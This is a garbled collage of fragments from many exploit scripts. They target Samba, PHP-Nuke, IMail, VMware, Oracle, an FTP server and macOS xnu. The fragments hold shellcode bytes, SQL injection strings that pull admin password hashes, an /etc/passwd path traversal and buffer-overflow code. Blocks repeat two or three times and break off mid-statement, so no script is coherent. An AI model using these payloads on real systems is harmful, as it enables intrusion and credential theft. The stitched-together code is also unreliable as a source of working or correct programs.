"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x 59\xb6\x18\x15". Summary ------- The Create Process & Create Process Ex method doesn't check if they're being called from the application, or malicious users. $c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (! Note that this vulnerability is exploitable only * when domain logon support is enabled in Samba. send_udp(inet_addr(argv[2]), samlogon, nl Offset)) fprintf(stderr, "[! Sprite; import * public class Test Xss extends flash.display. When a signature is found the patch is applied at patchoffset # bytes from the beginning of the signature.

Please see the Metasploit # Framework web site for more information on licensing and terms of use. \n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = "80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."custom.php? # # Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20 # # Tested On Windows 2003 SP1 CN # # D:\perl 192.168.226.128 143 # * OK IMAP4 Server (IMail 9.10) # 0 OK LOGIN completed # * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) # * 1 EXISTS # * 1 RECENT # * OK [UIDVALIDITY 1185337300] UIDs valid # * OK [UIDNEXT 485337302] Predicted next UID # 2 OK [READ-WRITE] SELECT completed # -------------- [BEGIN] ------------------- # ---------------- [END] ------------------ # # # D:\ # # use strict; use warnings; use IO:: Socket; #Target IP my $host = shift ; my $port = shift ; my $account = "void"; my $password = "ph4nt0m.org"; my $pad1 = "void[at]ph4nt0m.org_" x 4 . ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (! \n", num_bytes); exit (EXIT_FAILURE); } return (buf); } int main (int argc, char ** argv) { char fnbuf[MAX_PATH_LEN], *ptr, *cur, *end; int fd, wfd, found, size; struct stat fbuf; printf ("Apple MACOS X xnu \n", argv[0]); exit (EXIT_SUCCESS); } if ((fd = open (argv[1], O_RDONLY)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } snprintf (fnbuf, sizeof fnbuf, "%s-pown", argv[1]); if ((wfd = open (fnbuf, O_RDWR | O_CREAT)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } if (fstat (fd, &fbuf) n Code Slots = htonl (CSLOTS_DIFF); found = 1; } } } } } if (! name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20 as%20aid,null%20as%20time,pwd%20as%20title,null%20 as%20hometext,aid%20as%20bodytext,null%20as%20topi c,null%20as%20informant,null%20as%20notes,null%20a s%20acomm,%20null%20as%20haspoll,null%20as%20poll I D,null%20as%20score,null%20as%20ratings%20FROM%20% 60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php? )/", $result, $match)) print "\n Admin's name: " .$match[0];} else {echo "Exploit failed...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; } ? */ struct nmb_name { nstring name; char scope[64]; unsigned int name_type; }; void safe_strcpy(char *a, char *b, uint32_t size) { strcpy(b, a); } void put_name(char *dest, const char *name, int pad, unsigned int name_type) { size_t len = strlen(name); memcpy(dest, name, (len scope)); p = &buf[offset+1]; while ((p = strchr(p,'.'))) { buf[offset] = PTR_DIFF(p,&buf[offset+1]); offset += (buf[offset] + 1); p = &buf[offset+1]; } buf[offset] = strlen(&buf[offset+1]); } return(ret); } typedef struct exudp_s { unsigned char msg_type; unsigned char flags; uint16_t dgm_id; uint32_t source_ip; uint16_t source_port; uint16_t dgm_len; uint16_t p Offset; struct nmb_name source_name; struct nmb_name dest_name; } exudp; /* code */ int send_udp(int ip, char *packet, unsigned int packet Size) { int fd; struct sockaddr_in to; int len; if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) 15) { printf("[! /usr/bin/python # Windows locked screen remote firewire unlockor # Metlstorm 2k6 # Uh, private use only, not for public distro, kthx.

# # NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!! 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (! /bin/bash # PR07-37-scan if [ $# -ne 1 ] then echo "$0 /dev/null then echo "$i is VULNERABLE! \n"); exit (EXIT_FAILURE); } write (wfd, ptr, size); fchmod(wfd, fbuf.st_mode); close (wfd); free (ptr); fprintf (stdout, "* done\nexecute ./%s at your own risk! \n", fnbuf); return (EXIT_SUCCESS); } [table prefix]\n"; print "ex.: " . " 7\n"; credits(); exit; } /* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php? "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(? */ #include /* smb ripped defines/etc */ #define MAX_DGRAM_SIZE 576 #define MAX_NETBIOSNAME_LEN 16 typedef char nstring[MAX_NETBIOSNAME_LEN]; typedef char unstring[MAX_NETBIOSNAME_LEN*4]; enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; #define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) #define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ #define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0x FF), CVAL_NC(buf,pos+1)=(unsigned char)((val)8)) #define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) #define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) /* A netbios name structure. SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); select * from sh2kerr; /************************************************** ****************/ /******* Oracle 10g R1 x Db. Request(url, None, headers) html = urllib2.urlopen(req).read() html = re.sub('\n','',html) ident =re.findall('\$conf_oreon\[\'host\'\] = "(.*? [0in] From Dark-Code Rs Security & Programming Group!

8B8D 28EFFFFF |MOV ECX, DWORD PTR SS:[EBP-10D8] # 00418CD0 |. # But others like "SEARCH BEFORE" command will also trigger the overflow. ',$user); $user = strrev($user[1]); $user = substr($user,4,100); $user = strrev($user); echo "--EXPLOIT FINISHED--\n"; echo "userid : $userid\n"; echo "username: $user\n"; echo "password: $pw\n"; echo '--------------------'; } ? = 5) Error Quit("Not Windows NT family OS.\n"); printf("Major Version:%d Minor Version:%d\n", Major Version, Minor Version); switch(Minor Version) { case 1: //Windows XP System Id = 4; Token Offset = 0xc8; break; case 2: //Windows2003 System Id = 4; Token Offset = 0xc8; break; default: System Id = 8; Token Offset = 0xc8; } p Restore Buffer = malloc(0x100); if(p Restore Buffer == NULL) Error Quit("malloc failed.\n"); h Kernel = Load Library(Kernel Name); if(h Kernel == NULL) Error Quit("Load Library failed.\n"); printf("Load Base:%x\n", (ULONG)h Kernel); SSTOffset = Get Service Table(h Kernel, (ULONG)Get Proc Address(h Kernel, "Ke Service Descriptor Table")); SSTOffset += Kernel Base; printf("System Service Table Offset:%x\n", SSTOffset); Function Number = *(PULONG)((ULONG)Zw Vdm Control + 1); printf("Nt Vdm Control funciton number:%x\n", Function Number); Hook Address = (ULONG)(SSTOffset + Function Number * 4); printf("Nt Vdm Cotrol function entry address:%x\n", Hook Address); Allocation Size = 0x1000; p Store Buffer = (PULONG)0x7; if(Zw Allocate Virtual Memory((HANDLE)0xffffffff, &p Store Buffer, 0, &Allocation Size, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)) Error Quit("Zw Allocate Virtual Memory failed.\n"); Function Address = (PUCHAR)Get Proc Address(h Kernel, "Nt Vdm Control"); if(Function Address == NULL) Error Quit("Get Proc Address failed.\n"); *(PULONG)p Restore Buffer = Function Address - (PUCHAR)h Kernel + Kernel Base; memset((PVOID)0x0, 0x90, Allocation Size); h Device = Create File("\\\\.\\HGFS", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(h Device == INVALID_HANDLE_VALUE) Error Quit("Create File failed.\n"); p Shellcode = (PULONG)shellcode; for(k = 0; p Shellcode[k++] ! = '\x0'; j++) buf[j] = Compute Hash(kfunctions[j]); buf[j++] = pbi. ' [+] nuke version: '.$version.' '; #DEBUG //print $http . = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; @header = ('Cookie' =/i) { print "\n[+]Exploit succeeded! \nexiting..."); return -1; } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return -2; } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he-h_addr); memset(&(their_addr.sin_zero), '\', 8); if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); return -1; } return sock; } int main(int argc,char *argv[]) { printf("\n+===============================Yeah============ ==========================+"); printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); printf("\n+= Remote Buffer Overflow Do S Exploit =+"); printf("\n+= b Y =+"); printf("\n+= Maks M.

/use/bin/perl # # Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit # Author: Zhen Han. # # Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON". = -1: mid = line.split('memberid=')[1] ################################################## ##########################################Isset like starts try: mid except Name Error: sys.exit("[-]Can't Get \"memberid\". Get Version Ex(&ovi)) Error Quit("Get Version Ex failed.\n"); if(Major Version ! CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); /************************************************** ****************/ /******* Oracle 10g R1 x Db. %s 15 $((0x8744eff))\n", argv[0]); fprintf(stderr, "An address can be acquired with:\n"); fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \\t]\\+\\*%%esp'\n"); return 1; } attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1])); // output the bad PS printf( "%! = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; $logincookie = $cookie; print "\n[+]Eating cookie : P"; print "\n[+]Retrieving password"; @header = ('Cookie' =status_line; } print "\n[+]Retrieving username"; $query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,un ame,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd ! lang=&img=../../../../../etc/passwd" req = urllib2. POC: */ #include int port=21; struct hostent *he; struct sockaddr_in their_addr; int konekt(char *addr) { int sock; he=gethostbyname(addr); if(he==NULL) { printf("Unknow host!

||

# TODO: # Edit $target value # Run script # CPU 100%, Memory up for 1.2 Gb per one attack session. Additonally, this module will not work when the Samba "log level" parameter is higher than "2". Expect exploits for the rest of the auction items in the next week. Remote Attacker could craft a html page and execute code in a remote system with the actual user privileges. ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (! * * /////// * * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. targets=[{ "name":"Win XP SP2 Fast User Switching Unlock", "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. I hope this completely devalues the item so that the original finder dies of starvation. "\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x 5e\x81\x07\x8a". "\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\x ce\x79\x17\xfe". "\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x 58\x49\x38\xec". "\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x 8d\x2c\xdc\x5d". "\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\x e9\x64\xf9\x9e". "\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x 3d\x3b\xc8\xfe". "\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\x f8\x76\x14\x25". "\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\x e9\x2c\x07\xa5". "\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x 37\x95\xf0\x77". "\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x 60\x2b\xab\x26". "\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\x d0\x2b\x71\x94". "\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\x e3\x87\x28\x1d". "\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x 53\x31\x7e\x3c". "\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\x cf\xbe\x81\x22". "\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x 3f\x9d\x92\x25". "\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x 1c\x86\xba\x58". "\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x 48\xcb\xee\x8a". "\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\x e7\x29\xad\x24". "\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x 49\x4f\x07\xa5". "\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x 59\xb6\x18\x15". Summary ------- The Create Process & Create Process Ex method doesn't check if they're being called from the application, or malicious users. $c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (! Note that this vulnerability is exploitable only * when domain logon support is enabled in Samba. send_udp(inet_addr(argv[2]), samlogon, nl Offset)) fprintf(stderr, "[! Sprite; import * public class Test Xss extends flash.display. When a signature is found the patch is applied at patchoffset # bytes from the beginning of the signature. Please see the Metasploit # Framework web site for more information on licensing and terms of use. \n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = "80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."custom.php? # # Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20 # # Tested On Windows 2003 SP1 CN # # D:\perl 192.168.226.128 143 # * OK IMAP4 Server (IMail 9.10) # 0 OK LOGIN completed # * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) # * 1 EXISTS # * 1 RECENT # * OK [UIDVALIDITY 1185337300] UIDs valid # * OK [UIDNEXT 485337302] Predicted next UID # 2 OK [READ-WRITE] SELECT completed # -------------- [BEGIN] ------------------- # ---------------- [END] ------------------ # # # D:\ # # use strict; use warnings; use IO:: Socket; #Target IP my $host = shift ; my $port = shift ; my $account = "void"; my $password = "ph4nt0m.org"; my $pad1 = "void[at]ph4nt0m.org_" x 4 . ----------- Introduction ------------ is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Tested In --------- - Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. $ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (! \n", num_bytes); exit (EXIT_FAILURE); } return (buf); } int main (int argc, char ** argv) { char fnbuf[MAX_PATH_LEN], *ptr, *cur, *end; int fd, wfd, found, size; struct stat fbuf; printf ("Apple MACOS X xnu \n", argv[0]); exit (EXIT_SUCCESS); } if ((fd = open (argv[1], O_RDONLY)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } snprintf (fnbuf, sizeof fnbuf, "%s-pown", argv[1]); if ((wfd = open (fnbuf, O_RDWR | O_CREAT)) == -1) { perror ("open ()"); exit (EXIT_FAILURE); } if (fstat (fd, &fbuf) n Code Slots = htonl (CSLOTS_DIFF); found = 1; } } } } } if (! name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20 as%20aid,null%20as%20time,pwd%20as%20title,null%20 as%20hometext,aid%20as%20bodytext,null%20as%20topi c,null%20as%20informant,null%20as%20notes,null%20a s%20acomm,%20null%20as%20haspoll,null%20as%20poll I D,null%20as%20score,null%20as%20ratings%20FROM%20% 60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php? )/", $result, $match)) print "\n Admin's name: " .$match[0];} else {echo "Exploit failed...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; } ? */ struct nmb_name { nstring name; char scope[64]; unsigned int name_type; }; void safe_strcpy(char *a, char *b, uint32_t size) { strcpy(b, a); } void put_name(char *dest, const char *name, int pad, unsigned int name_type) { size_t len = strlen(name); memcpy(dest, name, (len scope)); p = &buf[offset+1]; while ((p = strchr(p,'.'))) { buf[offset] = PTR_DIFF(p,&buf[offset+1]); offset += (buf[offset] + 1); p = &buf[offset+1]; } buf[offset] = strlen(&buf[offset+1]); } return(ret); } typedef struct exudp_s { unsigned char msg_type; unsigned char flags; uint16_t dgm_id; uint32_t source_ip; uint16_t source_port; uint16_t dgm_len; uint16_t p Offset; struct nmb_name source_name; struct nmb_name dest_name; } exudp; /* code */ int send_udp(int ip, char *packet, unsigned int packet Size) { int fd; struct sockaddr_in to; int len; if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) 15) { printf("[! /usr/bin/python # Windows locked screen remote firewire unlockor # Metlstorm 2k6 # Uh, private use only, not for public distro, kthx. # # NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!! 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (! /bin/bash # PR07-37-scan if [ $# -ne 1 ] then echo "$0 /dev/null then echo "$i is VULNERABLE! \n"); exit (EXIT_FAILURE); } write (wfd, ptr, size); fchmod(wfd, fbuf.st_mode); close (wfd); free (ptr); fprintf (stdout, "* done\nexecute ./%s at your own risk! \n", fnbuf); return (EXIT_SUCCESS); } [table prefix]\n"; print "ex.: " . " 7\n"; credits(); exit; } /* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php? "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(? */ #include /* smb ripped defines/etc */ #define MAX_DGRAM_SIZE 576 #define MAX_NETBIOSNAME_LEN 16 typedef char nstring[MAX_NETBIOSNAME_LEN]; typedef char unstring[MAX_NETBIOSNAME_LEN*4]; enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; #define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) #define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ #define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0x FF), CVAL_NC(buf,pos+1)=(unsigned char)((val)8)) #define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) #define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) /* A netbios name structure. SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); select * from sh2kerr; /************************************************** ****************/ /******* Oracle 10g R1 x Db. Request(url, None, headers) html = urllib2.urlopen(req).read() html = re.sub('\n','',html) ident =re.findall('\$conf_oreon\[\'host\'\] = "(.*? [0in] From Dark-Code Rs Security & Programming Group! 8B8D 28EFFFFF |MOV ECX, DWORD PTR SS:[EBP-10D8] # 00418CD0 |. # But others like "SEARCH BEFORE" command will also trigger the overflow. ',$user); $user = strrev($user[1]); $user = substr($user,4,100); $user = strrev($user); echo "--EXPLOIT FINISHED--\n"; echo "userid : $userid\n"; echo "username: $user\n"; echo "password: $pw\n"; echo '--------------------'; } ? = 5) Error Quit("Not Windows NT family OS.\n"); printf("Major Version:%d Minor Version:%d\n", Major Version, Minor Version); switch(Minor Version) { case 1: //Windows XP System Id = 4; Token Offset = 0xc8; break; case 2: //Windows2003 System Id = 4; Token Offset = 0xc8; break; default: System Id = 8; Token Offset = 0xc8; } p Restore Buffer = malloc(0x100); if(p Restore Buffer == NULL) Error Quit("malloc failed.\n"); h Kernel = Load Library(Kernel Name); if(h Kernel == NULL) Error Quit("Load Library failed.\n"); printf("Load Base:%x\n", (ULONG)h Kernel); SSTOffset = Get Service Table(h Kernel, (ULONG)Get Proc Address(h Kernel, "Ke Service Descriptor Table")); SSTOffset += Kernel Base; printf("System Service Table Offset:%x\n", SSTOffset); Function Number = *(PULONG)((ULONG)Zw Vdm Control + 1); printf("Nt Vdm Control funciton number:%x\n", Function Number); Hook Address = (ULONG)(SSTOffset + Function Number * 4); printf("Nt Vdm Cotrol function entry address:%x\n", Hook Address); Allocation Size = 0x1000; p Store Buffer = (PULONG)0x7; if(Zw Allocate Virtual Memory((HANDLE)0xffffffff, &p Store Buffer, 0, &Allocation Size, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)) Error Quit("Zw Allocate Virtual Memory failed.\n"); Function Address = (PUCHAR)Get Proc Address(h Kernel, "Nt Vdm Control"); if(Function Address == NULL) Error Quit("Get Proc Address failed.\n"); *(PULONG)p Restore Buffer = Function Address - (PUCHAR)h Kernel + Kernel Base; memset((PVOID)0x0, 0x90, Allocation Size); h Device = Create File("\\\\.\\HGFS", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(h Device == INVALID_HANDLE_VALUE) Error Quit("Create File failed.\n"); p Shellcode = (PULONG)shellcode; for(k = 0; p Shellcode[k++] ! = '\x0'; j++) buf[j] = Compute Hash(kfunctions[j]); buf[j++] = pbi. ' [+] nuke version: '.$version.' '; #DEBUG //print $http . = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; @header = ('Cookie' =/i) { print "\n[+]Exploit succeeded! \nexiting..."); return -1; } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return -2; } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he-h_addr); memset(&(their_addr.sin_zero), '\', 8); if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); return -1; } return sock; } int main(int argc,char *argv[]) { printf("\n+===============================Yeah============ ==========================+"); printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); printf("\n+= Remote Buffer Overflow Do S Exploit =+"); printf("\n+= b Y =+"); printf("\n+= Maks M. /use/bin/perl # # Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit # Author: Zhen Han. # # Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON". = -1: mid = line.split('memberid=')[1] ################################################## ##########################################Isset like starts try: mid except Name Error: sys.exit("[-]Can't Get \"memberid\". Get Version Ex(&ovi)) Error Quit("Get Version Ex failed.\n"); if(Major Version ! CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); /************************************************** ****************/ /******* Oracle 10g R1 x Db. %s 15 $((0x8744eff))\n", argv[0]); fprintf(stderr, "An address can be acquired with:\n"); fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \\t]\\+\\*%%esp'\n"); return 1; } attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1])); // output the bad PS printf( "%! = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; $logincookie = $cookie; print "\n[+]Eating cookie : P"; print "\n[+]Retrieving password"; @header = ('Cookie' =status_line; } print "\n[+]Retrieving username"; $query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,un ame,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd ! lang=&img=../../../../../etc/passwd" req = urllib2. POC: */ #include int port=21; struct hostent *he; struct sockaddr_in their_addr; int konekt(char *addr) { int sock; he=gethostbyname(addr); if(he==NULL) { printf("Unknow host!

]] /dev/null then echo "$i is VULNERABLE! \n"); exit (EXIT_FAILURE); } write (wfd, ptr, size); fchmod(wfd, fbuf.st_mode); close (wfd); free (ptr); fprintf (stdout, "* done\nexecute ./%s at your own risk! \n", fnbuf); return (EXIT_SUCCESS); } [table prefix]\n"; print "ex.: " . " 7\n"; credits(); exit; } /* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php? "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(? */ #include /* smb ripped defines/etc */ #define MAX_DGRAM_SIZE 576 #define MAX_NETBIOSNAME_LEN 16 typedef char nstring[MAX_NETBIOSNAME_LEN]; typedef char unstring[MAX_NETBIOSNAME_LEN*4]; enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; #define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) #define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ #define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0x FF), CVAL_NC(buf,pos+1)=(unsigned char)((val)8)) #define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) #define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) /* A netbios name structure. SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); select * from sh2kerr; /************************************************** ****************/ /******* Oracle 10g R1 x Db. Request(url, None, headers) html = urllib2.urlopen(req).read() html = re.sub('\n','',html) ident =re.findall('$conf_oreon\[\'host\'\] = "(.*? [0in] From Dark-Code Rs Security & Programming Group!

